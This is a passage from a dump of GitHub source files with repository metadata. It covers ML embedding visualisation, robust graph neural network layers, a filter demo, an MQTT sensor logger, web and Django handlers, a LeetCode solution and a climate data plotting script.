open(os.path.join(log_dir, 'metadata.tsv'), \"w\") as f:\n f.write(f\"text \\t label \\n\")\n for i, txt in enumerate(data_text):\n f.write(f\"{txt.numpy().decode('utf-8')}\\t{data_label[i].numpy()}\\n\")\n\n weights = tf.Variable(model.get_embedding_layers_output(data_text))\n checkpoint = tf.train.Checkpoint(embedding=weights)\n checkpoint.save(os.path.join(log_dir, \"embedding.ckpt\"))\n config = projector.ProjectorConfig()\n embedding = config.embeddings.add()\n embedding.tensor_name = \"embedding/.ATTRIBUTES/VARIABLE_VALUE\"\n embedding.metadata_path = 'metadata.tsv'\n projector.visualize_embeddings(log_dir, config)\n","repo_name":"JoannaMisztalRadecka/text_classification_tf","sub_path":"text_classification/embedding_projector.py","file_name":"embedding_projector.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"6724873090","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"msdp\",\n version=\"0.0.5\",\n author=\"Miguel Ángel Alarcos Torrecillas\",\n author_email=\"miguel.alarcos@gmail.com\",\n description=\"Subscription Data Protocol for server side Python and asyncio\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/miguelalarcos/msdp.py\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n)","repo_name":"miguelalarcos/msdp.py","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"31286738618","text":"# from kf_book.book_plots import figsize\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nweights = [158.0, 164.2, 160.3, 159.9, 162.1, 164.6, \n 169.6, 167.4, 166.4, 171.0, 171.2, 172.6]\n\ntime_step = 1.0 # day\nscale_factor = 0.4 \n\ndef predict_using_gain_guess(estimated_weight, gain_rate, do_print=False): \n # storage for the filtered results\n estimates, predictions = [estimated_weight], []\n\n # most filter literature uses 'z' for measurements\n for z in weights: \n # predict new position\n predicted_weight = estimated_weight + gain_rate * time_step\n\n # update filter \n estimated_weight = predicted_weight + scale_factor * (z - predicted_weight)\n\n # save and log\n estimates.append(estimated_weight)\n predictions.append(predicted_weight)\n if do_print:\n print(f'measurement: {z:.4}, prediction: {predicted_weight:.4}, estimate: {estimated_weight:.4}')\n\n return estimates, predictions\n\ndef filter_plotting(estimates, predictions, weights):\n time_vector = np.arange(0,len(predictions),1)\n plt.figure(figsize=(16,9))\n plt.plot(estimates[1:], color='blue', marker='o', label='Estimated')\n plt.plot(predictions, color='red', marker='s', label='Predicted')\n plt.plot(weights,color='green', marker='x', label='Weights')\n plt.legend()\n plt.show()\n\ninitial_estimate = 200.\nestimates, predictions = predict_using_gain_guess(\n estimated_weight=initial_estimate, gain_rate=1, do_print=True) \n\n\nfilter_plotting(estimates=estimates, predictions=predictions, 
weights=weights)","repo_name":"YoussefAbbas2001/Pepso_Repo","sub_path":"Robotics/Navigation/bayesian_filters/gh_Filters/constant_scaling_filter.py","file_name":"constant_scaling_filter.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"25380706342","text":"from typing import Optional\n\nimport dgl\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom dgl import DGLError\n\nfrom graphattack.functional import spmm\nfrom graphattack.functional.transform import dgl_normalize\n\ntry:\n from glcore import dimmedian_idx\nexcept (ModuleNotFoundError, ImportError):\n dimmedian_idx = None\n\ntry:\n from glcore import topk\nexcept (ModuleNotFoundError, ImportError):\n topk = None\n\n\nclass DimwiseMedianConv(nn.Module):\n\n def __init__(self,\n in_feats,\n out_feats,\n add_self_loop=True,\n row_normalize=False,\n norm='none',\n activation=None,\n weight=True,\n bias=True):\n\n super().__init__()\n if norm not in ('none', 'both', 'right', 'left'):\n raise DGLError('Invalid norm value. Must be either \"none\", \"both\", \"right\" or \"left\".'\n ' But got \"{}\".'.format(norm))\n\n if dimmedian_idx is None:\n raise RuntimeWarning(\"Module 'glcore' is not properly installed, please refer to \"\n \"'https://github.com/EdisonLeeeee/glcore' for more information.\")\n\n self._in_feats = in_feats\n self._out_feats = out_feats\n self._norm = norm\n self._add_self_loop = add_self_loop\n self._row_normalize = row_normalize\n self._activation = activation\n\n if weight:\n self.weight = nn.Parameter(torch.Tensor(in_feats, out_feats))\n else:\n self.register_parameter('weight', None)\n\n if bias:\n self.bias = nn.Parameter(torch.Tensor(out_feats))\n else:\n self.register_parameter('bias', None)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n r\"\"\"\n Description\n -----------\n Reinitialize learnable parameters.\n Note\n ----\n The model parameters are initialized as in the\n `original implementation `__\n where the weight :math:`W^{(l)}` is initialized using Glorot uniform initialization\n and the bias is initialized to be zero.\n \"\"\"\n if self.weight is not None:\n nn.init.xavier_uniform_(self.weight)\n\n if self.bias is not None:\n nn.init.zeros_(self.bias)\n\n def forward(self, graph, feat, edge_weight=None):\n r\"\"\"\n\n Description\n -----------\n Compute Graph Convolution layer with\n Weighted Medoid aggregation.\n\n\n Parameters\n ----------\n graph : DGLGraph\n The graph.\n feat : torch.Tensor\n The input feature of shape :math:`(N, D_{in})` where :math:`D_{in}`\n is size of input feature, :math:`N` is the number of nodes.\n edge_weight : torch.Tensor, optional\n Optional edge weight for each edge. 
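A CUDA-free toy sketch of the underlying reduction (with equal weights\n            the glcore kernel reduces to a plain dimension-wise median; the\n            numbers are illustrative):\n\n                >>> x = torch.tensor([[0., 10.], [1., 0.], [9., 1.]])\n                >>> x.median(dim=0).values\n                tensor([1., 1.])\n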
\n\n Returns\n -------\n torch.Tensor\n The output feature of shape :math:`(N, D_{out})` where :math:`D_{out}`\n is size of output feature.\n \"\"\"\n\n assert edge_weight is None or edge_weight.size(0) == graph.num_edges()\n\n if self._add_self_loop:\n graph = graph.add_self_loop()\n if edge_weight is not None:\n size = (graph.num_nodes(),) + edge_weight.size()[1:]\n self_loop = edge_weight.new_ones(size)\n edge_weight = torch.cat([edge_weight, self_loop])\n else:\n graph = graph.local_var()\n\n edge_weight = dgl_normalize(graph, self._norm, edge_weight)\n\n if self.weight is not None:\n feat = feat @ self.weight\n\n # ========= weighted dimension-wise Median aggregation ===\n N, D = feat.size()\n row, col, e_id = graph.edges(order='srcdst', form='all')\n edge_index = torch.stack([row, col], dim=0)\n\n if self._norm != 'none':\n # if edge_weight is all 1 and it is not necessary\n # to sort again\n edge_weight = edge_weight[e_id]\n\n median_idx = dimmedian_idx(feat, edge_index, edge_weight, N)\n col_idx = torch.arange(D, device=graph.device).view(1, -1).expand(N, D)\n feat = feat[median_idx, col_idx]\n # Normalization and calculation of new embeddings\n if self._row_normalize:\n row_sum = edge_weight.new_zeros(feat.size(0))\n row_sum.scatter_add_(0, row, edge_weight)\n feat = row_sum.view(-1, 1) * feat\n # ========================================================\n\n if self.bias is not None:\n feat = feat + self.bias\n\n if self._activation is not None:\n feat = self._activation(feat)\n return feat\n\n def extra_repr(self):\n \"\"\"Set the extra representation of the module,\n which will come into effect when printing the model.\n \"\"\"\n summary = 'in={_in_feats}, out={_out_feats}'\n summary += ', normalization={_norm}'\n if '_activation' in self.__dict__:\n summary += ', activation={_activation}'\n return summary.format(**self.__dict__)\n\n\nclass SoftKConv(nn.Module):\n\n def __init__(self,\n in_feats,\n out_feats,\n add_self_loop=True,\n row_normalize=False,\n k=32,\n temperature=1.0,\n with_weight_correction=True,\n norm='none',\n activation=None,\n weight=True,\n bias=True):\n\n super().__init__()\n if norm not in ('none', 'both', 'right', 'left'):\n raise DGLError('Invalid norm value. 
Must be either \"none\", \"both\", \"right\" or \"left\".'\n ' But got \"{}\".'.format(norm))\n\n if topk is None:\n raise RuntimeWarning(\"Module 'glcore' is not properly installed, please refer to \"\n \"'https://github.com/EdisonLeeeee/glcore' for more information.\")\n\n self._in_feats = in_feats\n self._out_feats = out_feats\n self._norm = norm\n self._add_self_loop = add_self_loop\n self._row_normalize = row_normalize\n self._k = k\n self._temperature = temperature\n self._with_weight_correction = with_weight_correction\n self._activation = activation\n\n if weight:\n self.weight = nn.Parameter(torch.Tensor(in_feats, out_feats))\n else:\n self.register_parameter('weight', None)\n\n if bias:\n self.bias = nn.Parameter(torch.Tensor(out_feats))\n else:\n self.register_parameter('bias', None)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n r\"\"\"\n Description\n -----------\n Reinitialize learnable parameters.\n Note\n ----\n The model parameters are initialized as in the\n `original implementation `__\n where the weight :math:`W^{(l)}` is initialized using Glorot uniform initialization\n and the bias is initialized to be zero.\n \"\"\"\n if self.weight is not None:\n nn.init.xavier_uniform_(self.weight)\n\n if self.bias is not None:\n nn.init.zeros_(self.bias)\n\n def forward(self, graph, feat, edge_weight=None):\n r\"\"\"\n\n Description\n -----------\n Compute Graph Convolution layer with\n Soft Weighted Medoid topk aggregation.\n\n Parameters\n ----------\n graph : DGLGraph\n The graph.\n feat : torch.Tensor\n The input feature of shape :math:`(N, D_{in})` where :math:`D_{in}`\n is size of input feature, :math:`N` is the number of nodes.\n edge_weight : torch.Tensor, optional\n Optional edge weight for each edge. \n\n Returns\n -------\n torch.Tensor\n The output feature of shape :math:`(N, D_{out})` where :math:`D_{out}`\n is size of output feature.\n \"\"\"\n\n assert edge_weight is None or edge_weight.size(0) == graph.num_edges()\n\n if self._add_self_loop:\n graph = graph.add_self_loop()\n if edge_weight is not None:\n size = (graph.num_nodes(),) + edge_weight.size()[1:]\n self_loop = edge_weight.new_ones(size)\n edge_weight = torch.cat([edge_weight, self_loop])\n else:\n graph = graph.local_var()\n edge_weight = dgl_normalize(graph, self._norm, edge_weight)\n\n if self.weight is not None:\n feat = feat @ self.weight\n\n # ========= Soft Weighted Medoid in the top `k` neighborhood ===\n feat = soft_weighted_medoid_k_neighborhood(graph, feat, edge_weight, k=self._k,\n temperature=self._temperature,\n with_weight_correction=self._with_weight_correction,\n row_normalize=self._row_normalize)\n # ==============================================================\n\n if self.bias is not None:\n feat = feat + self.bias\n\n if self._activation is not None:\n feat = self._activation(feat)\n return feat\n\n def extra_repr(self):\n \"\"\"Set the extra representation of the module,\n which will come into effect when printing the model.\n \"\"\"\n summary = 'in={_in_feats}, out={_out_feats}'\n summary += ', normalization={_norm}'\n if '_activation' in self.__dict__:\n summary += ', activation={_activation}'\n return summary.format(**self.__dict__)\n\n\ndef soft_weighted_medoid_k_neighborhood(\n g: dgl.DGLGraph,\n feat: torch.Tensor,\n edge_weight: Optional[torch.Tensor] = None,\n k: int = 32,\n temperature: float = 1.0,\n with_weight_correction: bool = True,\n row_normalize: bool = False\n) -> torch.Tensor:\n \"\"\"Soft Weighted Medoid in the top `k` neighborhood (see Eq. 6 and Eq. 
7 in our paper). \n This function can be used as a robust aggregation function \n within a message passing GNN (e.g. see `models#RGNN`).\n\n Note that if `with_weight_correction` is false, \n we calculate the Weighted Soft Medoid as in Appendix C.4.\n\n Parameters\n ----------\n g : dgl.DGLGraph\n dgl graph instance.\n x : torch.Tensor\n Dense [n, d] tensor containing the node attributes/embeddings.\n edge_weight : torch.Tensor, optional\n edge weights of the edges in the graph `g`, by default `None` (1 for all edges).\n k : int, optional\n Neighborhood size for selecting the top k elements, by default 32.\n temperature : float, optional\n Controlling the steepness of the softmax, by default 1.0.\n with_weight_correction : bool, optional\n For enabling an alternative normalisazion (see above), by default True.\n row_normalize : bool, optional\n whether to perform normalization for aggregated features, by default False. \n\n Returns\n -------\n torch.Tensor\n The new embeddings [n, d] \n \"\"\"\n\n n = feat.size(0)\n assert k <= n\n\n row, col, e_id = g.edges(order='srcdst', form='all')\n if edge_weight is None:\n edge_weight = row.new_ones(row.size(0), dtype=torch.float)\n else:\n edge_weight = edge_weight[e_id]\n\n edge_index = torch.stack([row, col], dim=0)\n\n # Custom CUDA extension code for the top k values of the sparse adjacency matrix\n top_k_weights, top_k_idx = topk(edge_index, edge_weight, n, k)\n\n # Partial distance matrix calculation\n distances_top_k = partial_distance_matrix(feat, top_k_idx)\n\n # Multiply distances with weights\n distances_top_k = (top_k_weights[:, None, :].expand(n, k, k) * distances_top_k).sum(-1)\n distances_top_k[top_k_idx == -1] = torch.finfo(distances_top_k.dtype).max\n distances_top_k[~torch.isfinite(distances_top_k)] = torch.finfo(distances_top_k.dtype).max\n\n # Softmax over L1 criterium\n reliable_edge_weight = F.softmax(-distances_top_k / temperature, dim=-1)\n del distances_top_k\n\n # To have GCN as a special case (see Eq. 6 in our paper)\n if with_weight_correction:\n reliable_edge_weight = reliable_edge_weight * top_k_weights\n reliable_edge_weight = reliable_edge_weight / reliable_edge_weight.sum(-1).view(-1, 1)\n\n # Map the top k results back to the (sparse) [n,n] matrix\n top_k_inv_idx_row = torch.arange(n, device=g.device)[:, None].expand(n, k).flatten()\n top_k_inv_idx_column = top_k_idx.flatten()\n top_k_mask = top_k_inv_idx_column != -1\n\n # Note: The adjacency matrix A might have disconnected nodes. In that case applying the top_k_mask will\n # drop the nodes completely from the adj matrix making, changing its shape\n reliable_edge_index = torch.stack([top_k_inv_idx_row[top_k_mask], top_k_inv_idx_column[top_k_mask]])\n reliable_edge_weight = reliable_edge_weight[top_k_mask.view(n, k)]\n\n out = spmm(reliable_edge_index, reliable_edge_weight, n, feat)\n # Normalization and calculation of new embeddings\n if row_normalize:\n row_sum = edge_weight.new_zeros(feat.size(0))\n row_sum.scatter_add_(0, row, edge_weight)\n out = row_sum.view(-1, 1) * out\n return out\n\n\ndef partial_distance_matrix(feat: torch.Tensor, partial_idx: torch.Tensor) -> torch.Tensor:\n \"\"\"Calculates the partial distance matrix given the indices. 
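A shape-level doctest sketch (the indices are illustrative; -1 marks a\n    missing neighbour):\n\n        >>> x = torch.zeros(3, 4)\n        >>> idx = torch.tensor([[1, 2], [0, 2], [0, -1]])\n        >>> partial_distance_matrix(x, idx).shape\n        torch.Size([3, 2, 2])\n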
\n For a low memory footprint (small computation graph)\n it is essential to avoid duplicated computation of the distances.\n\n Parameters\n ----------\n x : torch.Tensor\n Dense [n, d] tensor with attributes to calculate the distance between.\n partial_idx : torch.Tensor\n Dense [n, k] tensor where `-1` stands for no index.\n Pairs are generated by the row id and the contained ids.\n\n Returns\n -------\n torch.Tensor\n [n, k, k] distances matrix (zero entries for `-1` indices) \n \"\"\"\n n, k = partial_idx.size()\n\n # Permute the indices of partial_idx\n idx_row = partial_idx[:, None, :].expand(n, k, k).flatten()\n idx_column = partial_idx[:, None, :].expand(n, k, k).transpose(1, 2).flatten()\n is_not_missing_mask = (idx_row != -1) & (idx_column != -1)\n idx_row, idx_column = idx_row[is_not_missing_mask], idx_column[is_not_missing_mask]\n\n # Use symmetry of Euclidean distance to half memory footprint\n symmetry_mask = idx_column < idx_row\n idx_row[symmetry_mask], idx_column[symmetry_mask] = idx_column[symmetry_mask], idx_row[symmetry_mask]\n del symmetry_mask\n\n # Create linear index (faster deduplication)\n linear_index = idx_row * n + idx_column\n del idx_row\n del idx_column\n\n # Avoid duplicated distance calculation (helps greatly for space cost of backward)\n distance_matrix_idx, unique_reverse_index = torch.unique(linear_index, return_inverse=True)\n\n # Calculate Euclidean distances between all pairs\n sparse_distances = torch.norm(feat[torch.div(distance_matrix_idx, n, rounding_mode='floor')] - feat[distance_matrix_idx % n], dim=1)\n\n # Create dense output\n out = torch.zeros(n * k * k, dtype=torch.float, device=feat.device)\n\n # Map sparse distances to output tensor\n out[is_not_missing_mask] = sparse_distances[unique_reverse_index]\n\n return out.view(n, k, k)\n","repo_name":"EdisonLeeeee/GUARD","sub_path":"GraphAttack/graphattack/nn/reliable_conv.py","file_name":"reliable_conv.py","file_ext":"py","file_size_in_byte":15420,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"84"} +{"seq_id":"30425349422","text":"#!/usr/bin/python3\n\nimport sqlite3\nimport paho.mqtt.client as mqtt\nimport base64\nimport json\nimport os\nimport signal\nimport time\nimport dateutil.parser\nfrom elsys_decoder import decoder\nfrom manage_db import load_cfg\n\ndef on_message(client, userdata, msg):\n db=userdata['db']\n print(msg.topic+\" \" +str(msg.payload))\n p = json.loads(msg.payload)\n data = None\n if 'end_device_ids' in p:\n dev_id = p['end_device_ids']['device_id']\n if 'received_at' in p:\n ts = p['received_at']\n t = dateutil.parser.isoparse(ts)\n if 'uplink_message' in p:\n enc = p['uplink_message']['frm_payload']\n data = base64.b64decode(enc)\n\n if data is not None:\n print(dev_id)\n print(t)\n print(data.hex())\n print(decoder(data))\n d = decoder(data)\n if 'temperature' in d and 'humidity' in d and 'light' in d and 'motion' in d and 'co2' in d and 'vdd' in d:\n with db:\n db.execute('insert into readings (timestamp, device_id, temperature, humidity, light, motion, co2, vdd) values (?, ?, ?, ?, ?, ?, ?, ?)',\n [t, dev_id,\n d['temperature'], d['humidity'],\n d['light'], d['motion'],\n d['co2'], d['vdd']])\n\ndef on_connect(client, userdata, flags, rc):\n print('Connected')\n client.subscribe('#')\n\ndef on_disconnect(client, userdata, rc):\n print('Disconnected')\n if rc != 0:\n print('Unexpected disconnection rc={}'.format(rc))\n\ndef on_subscribe(client, mid, qos, properties):\n print('SUBSCRIBED')\n\ndef main(cfg):\n db = 
sqlite3.connect(cfg['sqlite3_db_filename'])\n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n client.on_disconnect = on_disconnect\n client.username_pw_set(cfg['mqtt_username'],cfg['mqtt_password'])\n client.user_data_set({'db': db, 'cfg': cfg})\n client.connect(cfg['mqtt_hostname'],cfg['mqtt_port'],60)\n\n client.loop_forever()\n\nif __name__ == \"__main__\":\n cfg = load_cfg()\n print(cfg)\n main(cfg)\n\n","repo_name":"mrd/simple_ttn","sub_path":"simple_ttn.py","file_name":"simple_ttn.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"33743518151","text":"import webapp2\nfrom google.appengine.ext import db\nfrom common.utils import util, code\nfrom common import userop, modeldef\nfrom common.open import sina,twitter,facebook\n\nclass MainHandler(webapp2.RequestHandler):\n \n def get(self):\n pass\n \nclass QueryHandler(webapp2.RequestHandler):\n \n def get(self):\n \"\"\"Params\n account_type, account_name\"\"\"\n try:\n self.response.headers['Content-Type'] = 'text/plain'\n account_type = self.request.get('account_type')\n account_name = self.request.get('account_name')\n \n req = {'account_type': account_type, \n 'account_name': account_name}\n account = userop.get_account(req)\n \n res = {'ID':''}\n if account:\n res['ID'] = str(userop.get_user(account).ID)\n else:\n res['ID'] = 'None'\n except:\n res = util.Error_Bad_Request\n \n self.response.write(code.object_to_xml(res).toxml()) \n \nclass ExpiredHandler(webapp2.RequestHandler):\n \n def get(self):\n self.response.headers['Content-Type'] = 'text/plain'\n account_type = self.request.get('account_type')\n account_name = self.request.get('account_name')\n req = {'account_type': account_type, \n 'account_name': account_name} \n account = userop.get_account(req)\n \n if account:\n has_expired = getattr(self, '_do_%s' % account_type)(account)\n res = {'result': has_expired}\n else:\n res = util.Error_Bad_Request\n \n self.response.write(code.object_to_xml(res).toxml())\n \n def _do_sina(self, account):\n return sina.Sina(account.access_token).has_expired()\n \n def _do_twitter(self, account):\n return twitter.Twitter(account.access_token,account.access_secret).has_expired()\n \n def _do_facebook(self, account):\n return facebook.Facebook(account.access_token).has_expired()\n \napp = webapp2.WSGIApplication([\n ('/account/', MainHandler),\n ('/account/query', QueryHandler),\n ('/account/expired', ExpiredHandler)\n], debug=True)","repo_name":"hsfzxjy/hfzk2013","sub_path":"server/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"71615735954","text":"from enum import Enum\nfrom functools import total_ordering\n\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\nfrom django.db.models import (CharField, DateTimeField, ForeignKey,\n IntegerField, Model, Q)\nfrom django.db.models.deletion import CASCADE\nfrom elisio.parser.versefactory import VerseType\nfrom enumfields import EnumField\nfrom model_utils.managers import InheritanceManager\n\nfrom ..util.utils import get_commit\n\nfrom .metadata import Author, Book, Opus, Poem, Verse\n\n\nclass WordOccurrence(Model):\n verse = ForeignKey(Verse, CASCADE, null=True)\n word = CharField(max_length=20, db_index=True)\n struct = CharField(max_length=10)\n\n\nclass 
Batch(Model):\n timing = DateTimeField(auto_now=True)\n user = ForeignKey(User, CASCADE, null=True)\n items_at_creation_time = IntegerField(null=True)\n name = CharField(max_length=30)\n\n def get_number_of_verses(self):\n return sum(x.get_number_of_verses() for x in self.batchitem_set.select_subclasses())\n\n def build_batch_query(self):\n query = None\n for item in self.batchitem_set.all():\n try:\n dbitem = item.databasebatchitem\n q = dbitem.get_verse_query()\n if not query:\n query = q\n elif dbitem.relation == RelationType.EXCEPT:\n query &= ~dbitem.get_verse_query()\n else:\n query |= dbitem.get_verse_query()\n except AttributeError:\n pass\n return query\n\n def get_verses(self):\n return Verse.objects.filter(self.build_batch_query())\n\n def get_input_items(self):\n return (item for item in self.batchitem_set.all() if hasattr(item, \"contents\"))\n\n\nclass BatchItem(Model):\n batch = ForeignKey(Batch, CASCADE)\n objects = InheritanceManager()\n\n class Meta:\n base_manager_name = 'objects'\n\n def get_number_of_verses(self):\n raise Exception(\"must be overridden\")\n\n\n@total_ordering\nclass ObjectType(Enum):\n VERSE = 1\n POEM = 2\n BOOK = 3\n OPUS = 4\n AUTHOR = 5\n ALL = 9 # keep leeway for intermediate types\n\n def __lt__(self, other):\n if self.__class__ is other.__class__:\n return self.value < other.value\n return NotImplemented\n\n\nclass RelationType(Enum):\n EXCEPT = 1\n AND = 2\n OR = 3\n\n\nclass DatabaseBatchItem(BatchItem):\n object_type = EnumField(ObjectType, null=True)\n object_id = IntegerField(blank=True)\n relation = EnumField(RelationType, null=True)\n dependent_on = ForeignKey(\"self\", CASCADE, null=True)\n\n def save(self, *args, **kwargs):\n self.pre_save_hook()\n super().save(*args, **kwargs)\n\n def pre_save_hook(self):\n # rules for relations\n if self.relation == RelationType.AND:\n raise ValidationError(\"cannot have corpus conditions in an AND relation\")\n if self.relation and not self.dependent_on:\n # redeem impossible \"[] except self\"\n inter = DatabaseBatchItem()\n inter.object_type = ObjectType.ALL\n inter.save()\n self.dependent_on = inter\n self.relation = RelationType.EXCEPT\n if self.dependent_on and not self.relation:\n raise ValidationError(\"must have a relationship to its master\")\n if self.relation == RelationType.EXCEPT:\n if self.dependent_on.object_type <= self.object_type:\n raise ValidationError(\"the except clause must be more specific than its master\")\n if not self.__is_in(self.dependent_on):\n raise ValidationError(\"the except clause must be part of its master\")\n if self.relation == RelationType.OR and self.__is_in(self.dependent_on):\n raise ValidationError(\"the or clause must be distinct from its master\")\n try:\n self.get_object()\n except Exception:\n raise ValidationError(\"the object you're trying to save a BatchItem for doesn't exist\")\n\n def __is_in(self, other):\n if self.object_type > other.object_type:\n # only look one way\n return other.__is_in(self)\n if self.object_type == other.object_type:\n return self.object_id == other.object_id\n if other.object_type == ObjectType.ALL:\n return True\n me = self.get_object()\n you = other.get_object()\n while me:\n if me == you:\n return True\n me = me.get_parent()\n return False\n\n def get_number_of_verses(self):\n result = self.get_verses().count()\n if self.relation == RelationType.EXCEPT:\n result *= -1\n return result\n\n def get_object(self):\n if self.get_object_manager():\n return self.get_object_manager().get(pk=self.object_id)\n return None\n\n def 
get_object_manager(self):\n if self.object_type == ObjectType.VERSE:\n return Verse.objects\n if self.object_type == ObjectType.POEM:\n return Poem.objects\n if self.object_type == ObjectType.BOOK:\n return Book.objects\n if self.object_type == ObjectType.OPUS:\n return Opus.objects\n if self.object_type == ObjectType.AUTHOR:\n return Author.objects\n if self.object_type == ObjectType.ALL:\n return None\n raise ValidationError(\"Incorrect object type\")\n\n def get_verse_query(self):\n if self.object_type == ObjectType.VERSE:\n return Q(id=self.object_id)\n if self.object_type == ObjectType.POEM:\n return Q(poem_id=self.object_id)\n if self.object_type == ObjectType.BOOK:\n return Q(poem__book_id=self.object_id)\n if self.object_type == ObjectType.OPUS:\n return Q(poem__book__opus_id=self.object_id)\n if self.object_type == ObjectType.AUTHOR:\n if not self.object_id:\n return Q()\n return Q(poem__book__opus__author_id=self.object_id)\n raise ValidationError(\"Incorrect object type\")\n\n def get_verses(self):\n return Verse.objects.filter(self.get_verse_query())\n\n\nclass InputBatchItem(BatchItem):\n contents = CharField(max_length=70)\n scanned_as = EnumField(VerseType, null=True)\n\n def get_number_of_verses(self):\n return 1\n\n\nclass BatchRun(Model):\n batch = ForeignKey(Batch, CASCADE, null=True, default=None)\n timing = DateTimeField(auto_now=True)\n initiator = CharField(max_length=80, default='')\n commit = CharField(max_length=80, default=get_commit)\n\n\nclass BatchRunResult(Model):\n verse = ForeignKey(Verse, CASCADE) # TODO make optional\n session = ForeignKey(BatchRun, CASCADE)\n # TODO fk to BatchItem\n failure = CharField(max_length=70, blank=True)\n structure = CharField(max_length=8, blank=True)\n zeleny = CharField(max_length=17, blank=True)\n scanned_as = EnumField(VerseType)\n","repo_name":"blagae/versescanner","sub_path":"versescanner/models/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":6982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"20336240808","text":"from typing import List\nclass Solution:\n def matrixReshape(self, mat: List[List[int]], r: int, c: int) -> List[List[int]]:\n rmat = len(mat)\n cmat = len(mat[0])\n if rmat * cmat != r * c:\n return mat\n lmat = []\n for i in range(rmat):\n for j in range(cmat):\n lmat.append(mat[i][j])\n\n ans = []\n for i in range(r):\n row = []\n for j in range(c):\n row.append(lmat.pop(0))\n ans.append(row)\n\n return ans\n\ns = Solution()\nprint(s.matrixReshape([[1,2],[3,4]],1,4))\n","repo_name":"wtsai89/leetcode","sub_path":"Rehape the Matrix.py","file_name":"Rehape the Matrix.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"26301719307","text":"'''\n\nimport numpy as np\nimport iris\nimport iris.quickplot as qplt\nimport matplotlib.pyplot as plt\nimport iris.coord_categorisation\nimport iris.analysis\nimport running_mean\n\n#file = '/home/ph290/data1/observations/hadcrut4/HadCRUT.4.2.0.0.median.nc'\n#cube = iris.load_cube(file,'near_surface_temperature_anomaly')\n\nfile2 = '/home/ph290/data1/observations/hadisst/HadISST_sst.nc'\ncube = iris.load_cube(file2)\n\niris.coord_categorisation.add_year(cube, 'time', name='year')\ncube = cube.aggregated_by('year', iris.analysis.MEAN)\n\n\n#qplt.contourf(cube[-1])\n#plt.gca().coastlines()\n#plt.show()\n\n\ncube.coord('latitude').guess_bounds()\ncube.coord('longitude').guess_bounds()\ngrid_areas 
= iris.analysis.cartography.area_weights(cube)\n\ncube2 = cube.copy()\ncube3 = cube.copy()\n\nx, y = iris.analysis.cartography.get_xy_grids(cube2)\n\n\nlon_west = -180\nlon_east = 180\nlat_south = -90\nlat_north = 0\nloc = np.where((x >= lon_west) & (x <= lon_east) & (y >= lat_south) & (y <= lat_north))\n\ncube2.data[:,loc[0],loc[1]] = np.nan\ncube2.data.mask[:,loc[0],loc[1]] = True\n#qplt.contourf(cube2[-1])\n#plt.gca().coastlines()\n#plt.show()\n\nlon_west = -100\nlon_east = 20\nlat_south = 0.0\nlat_north = 75\n\nlon_west = -180\nlon_east = 180\nlat_south = 0\nlat_north = 90\n\nloc2 = np.where((x >= lon_west) & (x <= lon_east) & (y >= lat_south) & (y <= lat_north))\n\ncube3.data[:,loc2[0],loc2[1]] = np.nan\ncube3.data.mask[:,loc2[0],loc2[1]] = True\nqplt.contourf(cube3[-1])\nplt.gca().coastlines()\nplt.show()\n\nts0 = cube.collapsed(['latitude','longitude'], iris.analysis.MEAN, weights=grid_areas)\nts1 = cube2.collapsed(['latitude','longitude'], iris.analysis.MEAN, weights=grid_areas)\nts2 = cube3.collapsed(['latitude','longitude'], iris.analysis.MEAN, weights=grid_areas)\n\ncoord = ts0.coord('time')\ndt = coord.units.num2date(coord.points)\nyear = np.array([coord.units.num2date(value).year for value in coord.points])\n\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport iris\nimport iris.quickplot as qplt\nimport running_mean\n\n# NOTE: cube, ts0-ts2 and year are computed in the commented-out block above;\n# run (or uncomment) that block first, otherwise the plotting code below has no data.\n\nfile_forcing = '/home/ph290/data1/cmip5/forcing_data/volcanic_forcing.txt'\ndata_volc = np.genfromtxt(file_forcing,skip_header = 6)\n\nfile_forcing = '/home/ph290/data1/cmip5/forcing_data/rcp_forcing_data/historical_and_rcp85_atm_co2.txt'\ndata_co2 = np.genfromtxt(file_forcing,skip_header = 1,delimiter= ',')\n\nmeaning = 10\nlnwdth = 4\n\nfig, ax1 = plt.subplots(figsize=(6, 12))\nax1.plot(year,running_mean.running_mean(ts0.data-ts0[0].data,meaning),'b',linewidth = lnwdth,alpha = 0.75)\nax1.plot(year,running_mean.running_mean(ts1.data-ts1[0].data,meaning),'r',linewidth = lnwdth,alpha = 0.75)\nax1.plot(year,running_mean.running_mean(ts2.data-ts2[0].data,meaning),'g',linewidth = lnwdth,alpha = 0.75)\n\nax2 = ax1.twinx()\n#ax2.plot(data[:,0],data[:,1])\nax2.plot(data_volc[:,0],data_volc[:,2],'k--',linewidth = lnwdth,alpha = 0.5) # N\nax2.plot(data_volc[:,0],data_volc[:,3],'k-',linewidth = lnwdth,alpha = 0.5) # S\n\nax3 = 